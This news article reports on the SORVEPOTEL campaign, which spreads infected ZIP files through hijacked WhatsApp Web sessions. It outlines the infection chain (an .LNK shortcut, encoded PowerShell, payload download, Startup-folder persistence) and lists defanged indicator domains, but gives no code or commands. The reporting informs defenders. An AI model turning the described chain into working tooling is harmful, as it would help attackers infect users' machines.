Self-Spreading SORVEPOTEL Malware Exploits WhatsApp Web to Infect Windows Systems
WhatsApp Web sessions hijacked to deliver self-replicating ZIP malware across contact networks
A newly uncovered malware known as SORVEPOTEL is spreading automatically through WhatsApp Web, sending infected ZIP files to every contact of compromised users. Security researchers say the campaign has already struck hundreds of systems in Brazil and could mark a new phase in socially engineered self-replicating malware.
How the Campaign Began
The malware was discovered on October 3 by Trend Micro, which found that SORVEPOTEL spreads through desktop versions of WhatsApp rather than mobile apps.
Unlike classic spyware or ransomware, the code’s primary purpose is propagation — replicating itself across trusted chat networks instead of stealing information directly.
Researchers observed that once a single machine is infected, the malware automatically hijacks any active WhatsApp Web session and sends the same malicious ZIP file to every visible contact and group. Within minutes, hundreds of outbound messages can be generated, creating an exponential infection pattern reminiscent of early-2000s worms.
Infection Chain
The initial vector is a phishing message — delivered via WhatsApp or email — from an already compromised contact. The text urges the recipient to open a ZIP file with legitimate-looking names such as “RES-20250930_112057.zip” or “ComprovanteSantander-75319981.zip.”
Inside the archive lies a hidden .LNK shortcut that executes a PowerShell command, launching a chain of scripts designed to download and install the SORVEPOTEL payload.
Trend Micro analysis shows that the commands use Base64 encoding and hidden-window execution to evade detection. The downloaded batch file then copies itself into the Windows Startup folder, guaranteeing persistence on reboot.
| Stage | Action | Technique |
|---|---|---|
| 1 | User opens malicious ZIP | Social engineering |
| 2 | .LNK runs encoded PowerShell |
Script obfuscation |
| 3 | Payload fetched from remote domain | Command-and-control |
| 4 | Script adds itself to Startup | Persistence |
| 5 | WhatsApp Web sends new ZIPs | Automated propagation |
Scale and Geographic Focus
According to telemetry cited by The Hacker News, 477 systems have been infected so far — 457 of them in Brazil.
The campaign primarily targets government offices, education networks, and small-to-medium enterprises where WhatsApp Web is commonly used for coordination.
Although still concentrated in Latin America, security analysts note early detections in Portugal, Spain, and Argentina. Because propagation depends on contact lists rather than regional infrastructure, researchers warn that one international chat connection could globalize the outbreak.
Infrastructure and Indicators
The malware’s infrastructure relies on small, fast-moving domains hosted through inexpensive overseas registrars. Known examples include:
sorvetenopoate[.]comexpahnsiveuser[.]com
These sites deliver plain-text PowerShell or batch scripts instead of compiled binaries, allowing rapid re-tooling when blocks occur.
So far, investigators have not found evidence of large-scale credential theft or encryption activity — SORVEPOTEL’s behavior is almost entirely centered on spreading itself.
Links to Previous Campaigns
The tactics echo those of earlier mobile-focused threats such as FluBot, PixPirate, and WhatsApp Pink, but SORVEPOTEL distinguishes itself by abusing Windows desktop integrations rather than Android apps.
Security teams at IBM X-Force noted that its scripting resembles older email-worm logic combined with modern social-network vectors.
Comparative Overview
| Malware | Platform | Propagation Method | Primary Motive |
|---|---|---|---|
| FluBot | Android | SMS links | Banking credential theft |
| PixPirate | Android | WhatsApp messages | Financial fraud |
| SORVEPOTEL | Windows + WhatsApp Web | Automated contact messaging | Mass replication |
The pattern aligns with what researchers describe as “human-network exploitation” — attacks that weaponize trust relationships instead of software vulnerabilities.
Broader Implications
Analysts warn that SORVEPOTEL could signal a resurgence of worm-like malware inside modern communication ecosystems. By leveraging legitimate browser sessions, attackers bypass enterprise firewalls and deliver payloads directly into private or business group chats.
A study on message-forwarding dynamics found that WhatsApp chains can reach thousands of recipients within an hour, amplifying any malicious link or attachment through ordinary user behavior. (arxiv.org)
If adapted for data theft or credential harvesting, the same infrastructure could rapidly evolve into an espionage or ransomware vehicle, exploiting the human network as an unwitting distribution system.
Industry and Platform Response
Meta, which owns WhatsApp, confirmed that its automated systems are suspending accounts generating unusual message volumes, though it has not released official figures.
Trend Micro continues to publish indicators of compromise, and Brazilian authorities have opened a joint investigation with the national CERT.
Security bodies note parallels with the Collins Aerospace ransomware disruptions, where a single supplier’s failure cascaded into widespread operational impact. Both incidents highlight how interconnected digital ecosystems amplify exposure.
Statistics and Early Findings
Current telemetry estimates:
- 477 total infections, 95 percent within Brazil.
- At least six active command-and-control domains identified.
- Average propagation rate exceeding 100 outbound ZIPs per host within the first hour.
If left unchecked, analysts say similar campaigns could spread faster than email worms once did, fueled by always-on connectivity and user trust in messaging platforms.
European and Global Context
The SORVEPOTEL incident surfaces amid growing concern over messaging-based espionage.
Only days earlier, European and Ukrainian authorities reported arrests tied to Chinese cyber-operations, while ESET confirmed collaboration between Russian groups Gamaredon and Turla targeting Ukrainian institutions.
Together, these cases reveal how both state and criminal actors exploit everyday communication tools for strategic or financial gain. Recent arrests in Ukraine demonstrate how chat platforms are increasingly implicated in broader geopolitical conflict.
Outlook
The emergence of SORVEPOTEL underscores the fragility of communication ecosystems when convenience tools bridge mobile and desktop environments.
By turning WhatsApp Web sessions into malware conduits, the attackers behind this campaign exposed a global weak point — where personal trust intersects with enterprise workflows.
While its reach remains regionally contained, experts agree that SORVEPOTEL’s architecture could easily be repurposed for espionage or monetized extortion, making it a template worth close watch across the cybersecurity community.
